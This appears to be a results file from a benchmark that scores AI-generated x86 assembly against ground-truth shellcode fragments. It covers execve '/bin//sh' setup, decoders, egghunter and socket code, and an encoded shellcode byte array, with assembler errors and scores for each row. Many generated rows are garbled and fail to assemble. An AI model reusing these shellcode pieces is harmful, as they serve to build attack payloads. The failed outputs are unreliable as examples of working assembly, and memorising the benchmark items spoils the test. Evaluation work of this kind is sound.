eax;No compiler errors;1 +mov edx, 2;mov edx, 2;Matched with ground truth;1 +mov esi, esp;mov esi, esp;Matched with ground truth;1 +mov ebx, esp;mov ebx, esp;Matched with ground truth;1 +sub eax, [esp];sub eax, esp;No compiler errors;1 +mov cx, 0x301;mov cx, 0x301;Matched with ground truth;1 +hello: db 'hello world!',10;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov linefeed, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: error: symbol `linefeed' not defined +";0 +cmp cl, 0xff \\n jne dup2;cmp cl, 0xff, \\n jne _dup2;"assembly_instruction.asm:2: error: symbol `_dup2' not defined +";1 +inc esi \\n inc esi;inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc;"assembly_instruction.asm:26: error: invalid combination of opcode and operands +";0 +lea ebx, [edx+0x4];lea ebx, [edx+0x4];Matched with ground truth;1 +shr dl, 4;shr dl, 4;Matched with ground truth;1 +xor eax, 0x6e696230;xor eax, 0x6e696230;Matched with ground truth;1 +call [esp];int 0x80;No compiler errors;1 +mov edi, 0xaaaa9090;mov edi, 0xaaaa9090;Matched with ground truth;1 +jb next;inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0;"assembly_instruction.asm:1: error: symbol `var0' not defined +assembly_instruction.asm:2: error: symbol `var0' not defined +assembly_instruction.asm:3: error: symbol `var0' not defined +assembly_instruction.asm:4: error: symbol `var0' not defined +assembly_instruction.asm:5: error: symbol `var0' not defined +assembly_instruction.asm:6: error: symbol `var0' not defined +assembly_instruction.asm:7: error: symbol `var0' not defined +assembly_instruction.asm:8: error: symbol `var0' not defined +assembly_instruction.asm:9: error: symbol `var0' not defined +assembly_instruction.asm:10: error: symbol `var0' not defined +assembly_instruction.asm:11: error: symbol `var0' not defined +assembly_instruction.asm:12: error: symbol `var0' not defined +assembly_instruction.asm:13: error: symbol `var0' not defined +assembly_instruction.asm:14: error: symbol `var0' not defined +assembly_instruction.asm:15: error: symbol `var0' not defined +assembly_instruction.asm:16: error: symbol `var0' not defined +assembly_instruction.asm:17: error: symbol `var0' not defined +";0 +filecontents: resb 128;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov filecontents, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: symbol `filecontents' not defined +";0 +mov al, 23;mov al, 23;Matched with ground truth;1 +mov edx, eax;xchg edx, eax;No compiler errors;1 +cmp al, cl \\n jne short decode \\n jmp shellcode;cmp al, cl \\n jne short decode \\n jmp shellcode;Matched with ground truth;1 +push dword eax;push dword eax;Matched with ground truth;1 +mov bl, 5;push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov bl, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: error: invalid combination of opcode and operands +";0 +pop ecx;pop we;"assembly_instruction.asm:1: error: symbol `we' not defined +";0 +push eax \\n push edx \\n push ecx \\n push ebx \\n mov edi, esp;push eax \\n push edx \\n push ecx \\n push ebx \\n mov edi, esp;Matched with ground truth;1 +mov ecx, esp;mov ecx, esp;Matched with ground truth;1 +call write;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +";1 +push 10 \\n mov eax, esp;push 10 \\n mov eax, esp;Matched with ground truth;1 +xchg ebx, eax;xchg eax, ebx;No compiler errors;1 +mov ecx, esp;mov ecx, [args];"assembly_instruction.asm:1: error: symbol `args' not defined +";1 +mov ecx, esp;mov ecx, esp;Matched with ground truth;1 +mov esi, esp;mov esi, esp;Matched with ground truth;1 +lea ecx, [esp];mov ebx, esp;No compiler errors;1 +lea edi, [ebx];lea edi, [ebx];Matched with ground truth;1 +xor dl, 0xbb;xor dl, 0xbb;Matched with ground truth;1 +mov cl, len;mov cl, 0x68732f2f \\n add cl, 0x68732f \\n add cl, 0x6e69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x6e69622f \\n add cl, 0x6e69622f \\n add cl, 0x69622f2f \\n add cl, 0x6;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: byte data exceeds bounds [-w+number-overflow] +";1 +mov cl, 0x2;mov cl, 0x2;Matched with ground truth;1 +mov eax, msg3;mov eax, msg3;Matched with ground truth;1 +push 0x78;push 0x78;Matched with ground truth;1 +mov al, 11 \\n int 0x80;int 0x80;No compiler errors;1 +sub bx, dx;sub bx, dx;Matched with ground truth;1 +push 0x61702f2f \\n push 0x6374652f \\n mov eax, esp;push 0x61702f2f \\n push 0x6374652f \\n mov eax, esp;Matched with ground truth;1 +mov edi, hexstr;mov edi, hexstr;Matched with ground truth;1 +jmp edi;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +";1 +variablename3: resd 1;push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n;"assembly_instruction.asm:18: error: comma, colon, decorator or end of line expected after operand +";0 +jae _start-0x24;jns _start-0x24;"assembly_instruction.asm:1: error: symbol `_start' not defined +";1 +push 0x2;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 +push eax \\n push 0x68732f2f \\n push 0x6e69622f \\n push ebx, esp \\n mov edx, eax \\n mov al, 0xb \\n int 0x80;push temrinated \\n push '/bin//sh' \\n push ebx \\n push edx \\n push temrinated \\n push '/bin//sh' \\n push ebx \\n mov edx, esp;"assembly_instruction.asm:1: error: symbol `temrinated' not defined +assembly_instruction.asm:2: warning: character constant too long [-w+other] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: symbol `temrinated' not defined +assembly_instruction.asm:6: warning: character constant too long [-w+other] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +";0 +xor ax, bx \\n jz call_decoded;xor ax, bx \\n jz call decoded;"assembly_instruction.asm:2: error: comma, colon, decorator or end of line expected after operand +";0 +mov edx, 0x1234567;mov edx, 0x1234567;Matched with ground truth;1 +mov [1000h], ax;mov ax, 1000h;No compiler errors;1 +pop esi;pop esi;Matched with ground truth;1 +call_egghunter:;call_egghunter:;Matched with ground truth;1 +mov ebx, type var3;mov ebx, var3;"assembly_instruction.asm:1: error: symbol `var3' not defined +";1 +open:;open_label:;No compiler errors;1 +mov ecx, esp;mov ecx, esp;Matched with ground truth;1 +switch:;_switch:;No compiler errors;1 +mov byte al, 0xa4;mov al, byte [0xa4];No compiler errors;1 +2:;numeric 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;"assembly_instruction.asm:1: error: parser: instruction expected +";0 +push 0xb \\n pop eax;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n mov eax, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +";1 +mov al, 0xb \\n int 0x80;mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +";1 +cmp BYTE al, 2 \\n je do_inject \\n jmp while;cmp al, 2 \\n jne while \\n jmp do_inject;"assembly_instruction.asm:2: error: symbol `while' not defined +assembly_instruction.asm:3: error: symbol `do_inject' not defined +";1 +pop ebx;pop ebx;Matched with ground truth;1 +push 0x10;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 +push byte 49;push byte 49;Matched with ground truth;1 +mov al, 0x58;push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n mov ebx, esp;No compiler errors;1 +xor eax, eax \\n push eax;push edx;No compiler errors;1 +cmp eax, ebx \\n je child;cmp eax, ebx \\n jne child;"assembly_instruction.asm:2: error: symbol `child' not defined +";1 +mov ax, 8h;mov ax, 8h;Matched with ground truth;1 +push 0x2f2f2f2f \\n mov ecx, esp;push 0x2f2f2f2f \\n mov ecx, esp;Matched with ground truth;1 +"call shellcode \\n message db ""/bin/sh""";push of /bin/sh \\n push eip \\n mov shellcode_label, esp;"assembly_instruction.asm:1: error: symbol `of' not defined +assembly_instruction.asm:2: error: symbol `eip' not defined +assembly_instruction.asm:3: error: symbol `shellcode_label' not defined +";0 +cmp bl, 0x1f;cmp bl, 0x1f;Matched with ground truth;1 +decoder: \\n pop esi \\n mov edi, esi;pop esi \\n mov edi, [esi];No compiler errors;1 +push 0x68736162;push 0x68736162;Matched with ground truth;1 +mov eax, 63;mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;"assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +";1 +mov al,0xa2 \\n int 80h;int 0x80;No compiler errors;1 +push eax \\n mov ebx, esp;push eax \\n mov ebx, esp;Matched with ground truth;1 +xchg byte [esi+1], al;inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc;"assembly_instruction.asm:26: error: invalid combination of opcode and operands +";0 +jmp short enc;jmp short enc;Matched with ground truth;1 +mov al,0x8 \\n mov cl,077o;reate: \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n mov 0x77, 0x;"assembly_instruction.asm:21: error: invalid combination of opcode and operands +";0 +stage:;_stage:;No compiler errors;1 +mov dl, 0x45;mov dl, 0x45;Matched with ground truth;1 +inc esi \\n jmp L1;inc L2 \\n jmp L2;"assembly_instruction.asm:1: error: symbol `L2' not defined +assembly_instruction.asm:2: error: symbol `L2' not defined +";0 +movq mm0, qword [edi];mov mm0, \xor_value\;"assembly_instruction.asm:1: error: symbol `xor_value' not defined +";0 +mov byte [esi], dl;mov dl, byte [esi];No compiler errors;1 +inc edi;inc edi;Matched with ground truth;1 +xor eax, [edi];xor eax, edi;No compiler errors;1 +mov al, 0x17;xor 0x17, 0x17;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +mov [esi+35], esi;mov esi+35, esi;"assembly_instruction.asm:1: error: invalid register set size +";0 +dec ecx;dec ecx;Matched with ground truth;1 +push word 0x3436;push word 0x3436;Matched with ground truth;1 +call jmp_search;call jmp_search;Matched with ground truth;1 +write_syscall equ 4;write_syscall equ 4;Matched with ground truth;1 +cmp BYTE [esi], 0x7 \\n jle lowbound;cmp BYTE [esi], 0x7 \\n jl lowbound;"assembly_instruction.asm:2: error: symbol `lowbound' not defined +";1 +add eax, 2;add eax, 2;Matched with ground truth;1 +push byte 4 \\n pop eax;push byte 4 \\n pop eax;Matched with ground truth;1 +push 0x64687373 \\n mov edi, esp;push 0x64687373 \\n mov edi, esp;Matched with ground truth;1 +jmp short four;jmp short four;Matched with ground truth;1 +xchg ebx, eax;xchg ebx, eax;Matched with ground truth;1 +buffersize: dw 1024;buffersize word 0x68732f \\n 0x68732f \\n 0x6e69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0;"assembly_instruction.asm:1: error: parser: instruction expected +assembly_instruction.asm:2: error: label or instruction expected at start of line +assembly_instruction.asm:3: error: label or instruction expected at start of line +assembly_instruction.asm:4: error: label or instruction expected at start of line +assembly_instruction.asm:5: error: label or instruction expected at start of line +assembly_instruction.asm:6: error: label or instruction expected at start of line +assembly_instruction.asm:7: error: label or instruction expected at start of line +assembly_instruction.asm:8: error: label or instruction expected at start of line +assembly_instruction.asm:9: error: label or instruction expected at start of line +assembly_instruction.asm:10: error: label or instruction expected at start of line +assembly_instruction.asm:11: error: label or instruction expected at start of line +assembly_instruction.asm:12: error: label or instruction expected at start of line +assembly_instruction.asm:13: error: label or instruction expected at start of line +assembly_instruction.asm:14: error: label or instruction expected at start of line +assembly_instruction.asm:15: error: label or instruction expected at start of line +assembly_instruction.asm:16: error: label or instruction expected at start of line +";0 +pop esi \\n mov bx, [esi];pop esi \\n mov bx, [esi];Matched with ground truth;1 +push eax \\n push 0x636e2f6e \\n push 0x69622f2f;push 0-term \\n push cn/n \\n push ib//;"assembly_instruction.asm:3: error: expression syntax error +";0 +push 0x2;push for \\n push af_inet;"assembly_instruction.asm:1: error: symbol `for' not defined +assembly_instruction.asm:2: error: symbol `af_inet' not defined +";1 +mov ecx, eax;mov ecx, eax;Matched with ground truth;1 +push word 0x8223;push word 0x8223;Matched with ground truth;1 +push 0x1ff9090 \\n pop ecx;push 0x1ff9090 \\n push ecx \\n push 0x10 \\n push 0x1ff9090 \\n push ecx \\n push 0x10 \\n mov 0x10, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: error: invalid combination of opcode and operands +";0 +cmp edx, 42;cmp edx, 42;Matched with ground truth;1 +push esi;push sockfd;"assembly_instruction.asm:1: error: symbol `sockfd' not defined +";1 +close:;close_label:;No compiler errors;1 +pop ecx \\n loop l1 \\n mov eax, 1;pop ecx \\n dec ecx \\n jmp l1;"assembly_instruction.asm:3: error: symbol `l1' not defined +";1 +matrix qw 12*10;for: \\n 12*10: \\n quad-bytes:;"assembly_instruction.asm:2: error: label or instruction expected at start of line +assembly_instruction.asm:3: error: parser: instruction expected +";0 +F5: \\n jmp L1;F5: \\n jmp L1;Matched with ground truth;1 +mov bl, 0xe;mov bl, 0xe;Matched with ground truth;1 +mov al, 0x01;mov byte [eax], 0x1;No compiler errors;1 +R1: \\n inc esi \\n inc esi;inc R1 \\n inc esi;"assembly_instruction.asm:1: error: symbol `R1' not defined +";0 +xor byte [esi], 0x2c;xor 0x2c, esi;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +mov edi, 0x978cd092 \\n mov ebx, edi;push 0x978cd092 \\n pop edi \\n pop ebx;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +";1 +mov ebx, esp;mov ebx, ptr;"assembly_instruction.asm:1: warning: `ptr' is not a NASM keyword [-w+ptr] +assembly_instruction.asm:1: error: symbol `ptr' not defined +";0 +lea ebx, [esp];mov ebx, esp;No compiler errors;1 +push 0x74756f2f;push 0x74756f2f;Matched with ground truth;1 +loop bucle;dec ecx \\n jns bucle;"assembly_instruction.asm:2: error: symbol `bucle' not defined +";1 +push 0x3a303a3a;push 0x3a303a3a;Matched with ground truth;1 +jns loop2;jns _loop2;"assembly_instruction.asm:1: error: symbol `_loop2' not defined +";1 +push 0x30;push 0x30;Matched with ground truth;1 +S1: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73;0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73 db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73;"assembly_instruction.asm:1: error: label or instruction expected at start of line +";0 +F1: \\n pop esi;F1: \\n pop esi;Matched with ground truth;1 +push 0x68732f2f \\n push 0x6e69622f \\n mov eax, esp;mov eax, ASCII /bin/sh;"assembly_instruction.asm:1: error: symbol `ASCII' not defined +";0 +mov cx, 2001Q;mov cx, 2001Q;Matched with ground truth;1 +jne no_error;jne no_error;Matched with ground truth;1 +cmp cl, 0x11 \\n jb 0xff \\n add dl, 0x5;cmp cl, 0x11 \\n add dl, 0x5;No compiler errors;1 +xor eax, 0x58494741;xor eax, 0x58494741;Matched with ground truth;1 +L3: \\n jmp edi;L3: \\n jmp edi;Matched with ground truth;1 +push ebx;push ebx;Matched with ground truth;1 +xor ecx, ecx \\n mov cl, shellcode_length;xor shellcode_length, shellcode_length \\n mov byte [shellcode_length], shellcode_length;"assembly_instruction.asm:1: error: symbol `shellcode_length' not defined +assembly_instruction.asm:2: error: symbol `shellcode_length' not defined +";0 +mov al, 0x42;mov al, 0x42;Matched with ground truth;1 +mov byte [esp], 0x2f;mov byte [var1], 0x2f;"assembly_instruction.asm:1: error: symbol `var1' not defined +";1 +xor ebx, ebx \\n xor edx, edx;xor ebx, ebx \\n mul ebx;No compiler errors;1 +mov dword [esp-4], esi;mov dword [[], esi;"assembly_instruction.asm:1: error: expression syntax error +";0 +mov [esi], al;mov esi, al;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +xor ecx, ecx \\n mul ecx;xor eax, eax \\n xor ecx, ecx;No compiler errors;1 +jmp short decode_pr;decode_pr: \\n inc decode_pr;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +";0 +function_5: \\n call [esp];function_5: \\n int 0x80;No compiler errors;1 +mov cl, 100;mov cl, 100;Matched with ground truth;1 +xchg esi, eax;mov esi, esp;No compiler errors;1 +mov al, 0x66;mov al, 0x66;Matched with ground truth;1 +xor edx, edx \\n push edx;push edx;No compiler errors;1 +loop l4 \\n mov edx, esp;loop l4 \\n mov edx, esp;Matched with ground truth;1 +sub ecx,ecx \\n push ecx;xor ecx, ecx \\n push ecx;No compiler errors;1 +shellcode: db 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb;shellcode: db 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb;Matched with ground truth;1 +mov edx, ecx;mov edx, ecx;Matched with ground truth;1 +test eax, eax \\n jz short loc_402B13;test eax, eax \\n jz short loc_402B13;Matched with ground truth;1 +add eax, 0x10;add eax, 0x10;Matched with ground truth;1 +mov ecx, ebp;mov ecx, ebp;Matched with ground truth;1 +push 0x1;push socket_type \\n push = \\n push sock_stream;"assembly_instruction.asm:2: error: expression syntax error +";0 +add ax, [di + 20];add ax, di + 20;"assembly_instruction.asm:1: error: invalid register set size +";0 +mov al,0x6;mov al, 0x68732f2f \\n mov al, 0x68732f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: byte data exceeds bounds [-w+number-overflow] +";1 +dec esp;dec esp;Matched with ground truth;1 +push eax;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +";1 +sub eax,20000h;sub eax, 20000h;Matched with ground truth;1 +section .bss;section \\n uninitialized: db 0x68732f2f \\n db 0x6e69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f2f \\n db 0x69622;"assembly_instruction.asm:1: warning: multi-line macro `section' exists, but not taking 0 parameters [-w+macro-params-multi] +assembly_instruction.asm:1: warning: label alone on a line without a colon might be in error [-w+label-orphan] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data 